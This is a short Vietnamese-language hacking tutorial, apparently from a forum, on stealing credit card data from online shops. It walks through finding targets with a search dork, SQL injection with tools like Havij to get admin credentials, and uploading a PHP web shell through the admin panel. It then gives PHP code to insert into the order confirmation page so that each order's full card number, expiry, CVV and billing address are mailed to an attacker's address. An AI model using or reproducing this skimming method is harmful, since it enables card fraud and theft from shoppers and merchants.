Tut hack cc

1. allinurl: /sub.php?Page=1
2.  
3. chuyển về dạng
4.  
5. http://abc.com/detail.php?pid=....
6.  
7. hack bằng tool hoangduye cũng được mà havij cũng được,hack bằng cái gì cũng được
8.  
9. get admin ( trong table user nhớ gét colums role để tìm admin ,pass mã hóa sha1( admin thường thì role là 1)
10.  
11. link admin
12.  
13. http://abc.com/admin_login.php
14.  
15. http://abc.com/cp
16.  
17. vào admin phần category up shell lên để đuôi php hoặc .jpg.php tùy thích
18.  
19. tiếp theo vào shell sửa file orderconfirm.php ( tùy file tùy shop cách tìm file này là vào shop order đến phần nhập cc sau đó hiện comfim sẽ ra name file http://abc.com/file can edit .php
20.  
21. vào shell tìm file đó
22.  
23. sau đó tìm đoạn này
24.  
25. <? echo
26.  
27. "" . substr($card_no,-4) . "<br>" .
28.  
29. $ex_month . "/" . $ex_year . "<br>" .
30.  
31. $cid;
32.  
33. ?>
34.  
35. thường thì code gốc là hiện 4 số cuối của cc
36.  
37. sửa số màu đỏ thành số 0
38.  
39. sau đó gán thêm hàm này vào phía dưới
40.  
41. <?
42.  
43. $to = '[email protected]';
44.  
45. $subject = 'CC - Order ID:'+$order_id; $message = $order_id."|".$card_type."|".$card_no."|".$ex_mont h."|".$ex_year."|".$cid."|".$bill_name."|".$bill_a ddress."|".$bill_city."|".$bill_state."|".$bill_zi p."|".$bill_dphone."|".$bill_country; $headers = 'From: webmaster' . "\r\n" . 'Reply-To: webmaster' . "\r\n" .
46.  
47. 'X-Mailer: PHP/' . phpversion();
48.  
49. mail($to, $subject, $message, $headers);
50.  
51. ?>